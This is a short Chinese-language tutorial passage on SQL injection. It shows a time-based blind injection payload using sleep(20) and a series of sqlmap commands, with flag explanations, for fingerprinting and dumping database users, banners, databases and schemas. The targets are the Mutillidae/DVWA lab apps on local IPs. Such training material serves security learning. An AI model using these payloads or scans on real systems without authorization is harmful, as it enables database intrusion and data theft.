'and (select * from (select(sleep(20)))a)--+ (+代表空格)
看看是否是等待20秒再执行的
本次我们使用不是dvwa了,使用的是Mutilltidae
检测这个url是否存在漏洞,随便输入一个东西,复制url即可
sqlmap -u "http://192.168.0.119/mutillidae/index.php?page=user-info.php&username=1&password=erq&user-info-php-submit-button=View+Account+Details" -p username -f#-u后面跟url-p后面跟你只想检测那个变量-f是检测足迹指纹信息
--users #对数据库用户进行扫描 --banner #查看数据库banner信息 --dbs #查看数据库中的库 --schema #查源数据 -a #查询所有可以查询的 -m #后面跟一个文本文件,该文本文件存放多个需要扫描的链接 -g #扫描google搜索结果
sqlmap -d "mysql://用户名:密码@192.168.0.139:3306/dvwa" -f --users --banner --dbs --schema -a
sqlmap -r post.txt --dbs
sqlmap -l test.log
sqlmap -u "https://1.1.1.1/a.php?id=1:8843" --force-ssl
留言与评论(共有 0 条评论) “” |